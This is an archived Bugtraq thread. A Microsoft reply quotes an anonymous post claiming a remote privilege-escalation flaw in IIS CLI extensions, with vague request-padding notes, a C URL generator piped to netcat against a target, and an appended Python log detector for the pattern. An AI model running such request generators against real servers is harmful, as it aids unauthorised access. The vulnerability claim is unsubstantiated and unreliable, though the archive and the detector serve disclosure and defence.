[15284] in bugtraq


Re: Shinex vs. IIS CLI Extensions

daemon@ATHENA.MIT.EDU (Microsoft Security Response Center)
Sat Jun 10 02:14:17 2000

Message-Id:  <D1A11CCE78ADD111A35500805FD43F5807E0B47C@RED-MSG-04>
Date:         Thu, 8 Jun 2000 20:17:15 -0700
Reply-To: Microsoft Security Response Center <secure@MICROSOFT.COM>
From: Microsoft Security Response Center <secure@MICROSOFT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM


-----BEGIN PGP SIGNED MESSAGE-----

We'd be very interested in investigating this report, but unfortunately
we can't contact the author because of the anonymous remailer.  If the
author would contact us at secure@microsoft.com, we'd very much like to
get some additional information.  Regards,

Secure@microsoft.com

-----Original Message-----
From: dev-null@NO-ID.COM [mailto:dev-null@NO-ID.COM]
Sent: Monday, June 05, 2000 5:32 AM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Shinex vs. IIS CLI Extensions


[ This message has been sent anonymously due to configuration problems
I'm experiencing with my mail server. If you would like to discuss
the fine points of this post, you're quite welcome to message me on
Efnet (nickname: shinex). ]

While doing a security audit on a WinNT 4.0 system, I discovered an
`object collision` vulnerability that can potentially lead to remote
compromise.

The flaw lies in the mechanism employed by CLI objects to handle
dynamic pre-auth requests from a stateful client. States of operation
are inherent in the implementation itself. This flaw could lead to a
determined attacker gaining administrative privileges on servers
using this widely deployed object kit.

EXPLOITATION NOTES
------------------

Request #1:
http://www.victim.com/.....~518 chars.../[invocation of CLI object]

Request #2:
http://www.victim.com/.....~260 chars.../[request with req1 object as ext]

Simple as that.

It's important that both requests reach the target server within
a timeframe of 15 seconds (a rough estimate). Your threshold may vary.
Subsequent requests will be made with raised authorization levels.
The rationale for the char padding will be available later in the
followup post (see below).

Microsoft has been notified and patching information should be
forthcoming. While not as severe as the RDS vulnerability, it is still
an avenue of attack that could provide a determined attacker with
unauthorized access.

(Allow me to mention in passing that the scarcity of detail in this
paper is intentional. A more thorough assessment will be posted after
Microsoft have released their hotfix.)


HELPER CODE
-----------
/*
** clisweep.c by shinex (efnet)
** Quick generator for IIS4 CLI extension vuln URLs.
**
** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80
** OK. This code is buggy, because I mistakenly thought
** that both requests would be delivered without having
** to restart netcat. I can't code network apps. Sorry.
**
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define DOT1 518
#define DOT2 260
#define THRESHOLD 15
#define RANDFILE "AABBCC"

char *gendots(int);
char *calc(char *);

int main(int argc, char *argv[])
{
    char req1[1024], req2[1024];

    if(argc != 2)
    {
        fprintf(stderr, "Usage: %s <cli object>\n", *argv);
        return -1;
    }

    /* req1 is built first because calc() truncates argv[1] in place */
    snprintf(req1, sizeof(req1), "GET /%s/%s", gendots(DOT1), argv[1]);
    snprintf(req2, sizeof(req2), "GET /%s/%s", gendots(DOT2), calc(argv[1]));

#ifdef SCRIPTKIDPROTECTION
    printf("%s\n\n", req1);
    sleep(THRESHOLD);
    printf("%s\n\n", req2);
#endif
    return 0;
}

/* Fill a static buffer with `num` dots and return it. */
char *gendots(int num)
{
    int i;
    static char dots[1024];
    char *ptr = dots;

    /* clamp so the static buffer cannot overflow */
    if(num > (int)sizeof(dots) - 1)
        num = (int)sizeof(dots) - 1;

    for(i = 0; i < num; i++)
        *ptr++ = '.';
    *ptr = '\0'; /* terminate: the buffer is reused between calls */

    return dots;
}

/* Strip the object's extension and prefix RANDFILE: "x.ext" -> "AABBCC.x" */
char *calc(char *arg)
{
    static char file[1024];
    char *ptr;

    ptr = strrchr(arg, '.');
    if(ptr == NULL) /* no extension to strip */
        return arg;
    *ptr = '\0';
    snprintf(file, sizeof(file), "%s.%s", RANDFILE, arg);
    return file;
}


SHOUTOUTS
---------
Greets to route and my other friends.

--
This message has been sent via an anonymous mail relay at www.no-id.com.

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.3

iQEVAwUBOUBhxo0ZSRQxA/UrAQGUEwgArWqKiGuSBSKz71ui5jFmRAf0nPRm6ez6
Ly1wVNRQLIuknJmz7eS5I6mQ7+UTgaMpT90fHRN6heU7T45xdsNAHwrJ9btNPEpW
luW3q0fHMGaTEXAEm6pAvX5ORV7pWgvRV6NHBPFv5MTLNwd9xbC4mhJXpp7sdpkO
h3XDNSuOcRmHTCcBL1Ikq8R/MgogKe/+AdTGTolAr9uvwTRTEa4SMolp98jUh813
jd54uiWU7M1tu5Wi3gsiDnIske+TzijLoyx4n8G0o01BKieiOvrYbQVvUb92DTPu
EvetLz1Gavj41M9fCP2zmdUSJInRtPXhgF4DMaiL5h1Bu0zg/T8KRg==
=QG1C
-----END PGP SIGNATURE-----
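A defender-side check for the request pattern the quoted post describes, added here as an example and not part of either message above. It scans constructed log lines in a simplified W3C-style layout (date, time, client IP, method, URI stem, status; an assumption, not real IIS output) for paths carrying long runs of dots and pairs two such requests from the same client inside the 15-second window the post mentions. The 64-dot cutoff is an assumed threshold, chosen well below the ~260 and ~518 character paddings in the post; the padded-path regex, the log layout and the sample lines are all constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Thresholds: the 15-second window is the figure given in the post.
# MIN_DOT_RUN is an assumed cutoff; legitimate URL paths do not carry
# dozens of consecutive dots, and the post's padding is ~260 / ~518.
PAIR_WINDOW = timedelta(seconds=15)
MIN_DOT_RUN = 64

# Constructed sample lines (simplified W3C layout; not real IIS output):
# date time c-ip cs-method cs-uri-stem sc-status
SAMPLE_LOG = """\
2000-06-05 05:31:50 10.0.0.7 GET /default.asp 200
2000-06-05 05:32:01 10.0.0.9 GET /{d518}/cli.object 200
2000-06-05 05:32:09 10.0.0.9 GET /{d260}/AABBCC.cli 200
2000-06-05 05:40:00 10.0.0.9 GET /{d518}/cli.object 200
2000-06-05 05:40:30 10.0.0.9 GET /{d260}/AABBCC.cli 200
""".format(d518="." * 518, d260="." * 260)

LINE_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$"
)
DOT_RUN_RE = re.compile(r"\.{%d,}" % MIN_DOT_RUN)


def parse_line(line):
    """Parse one log line into a dict; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"],
                                  "%Y-%m-%d %H:%M:%S")
    run = DOT_RUN_RE.search(rec["path"])
    rec["dot_run"] = len(run.group(0)) if run else 0
    return rec


def padded_requests(lines):
    """Return parsed records whose path carries a suspicious run of dots."""
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["dot_run"] >= MIN_DOT_RUN:
            out.append(rec)
    return out


def find_pairs(records, window=PAIR_WINDOW):
    """Pair consecutive padded requests from the same client within `window`."""
    by_ip = defaultdict(list)
    for rec in records:
        by_ip[rec["ip"]].append(rec)
    pairs = []
    for recs in by_ip.values():
        recs.sort(key=lambda r: r["ts"])
        for first, second in zip(recs, recs[1:]):
            if second["ts"] - first["ts"] <= window:
                pairs.append((first, second))
    return pairs


def scan(log_text):
    """Entry point: (flagged padded requests, pairs inside the window)."""
    flagged = padded_requests(log_text.splitlines())
    return flagged, find_pairs(flagged)


if __name__ == "__main__":
    flagged, pairs = scan(SAMPLE_LOG)
    print("%d padded request(s), %d pair(s) inside the window"
          % (len(flagged), len(pairs)))
    for first, second in pairs:
        gap = (second["ts"] - first["ts"]).seconds
        print("  %s: %d dots then %d dots, %ds apart"
              % (first["ip"], first["dot_run"], second["dot_run"], gap))
```

On the sample input the two 05:32 requests from 10.0.0.9 (8 seconds apart) are reported as a pair, while the 05:40 requests (30 seconds apart) are flagged individually but not paired; the window is a parameter because the post itself calls 15 seconds a rough estimate.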

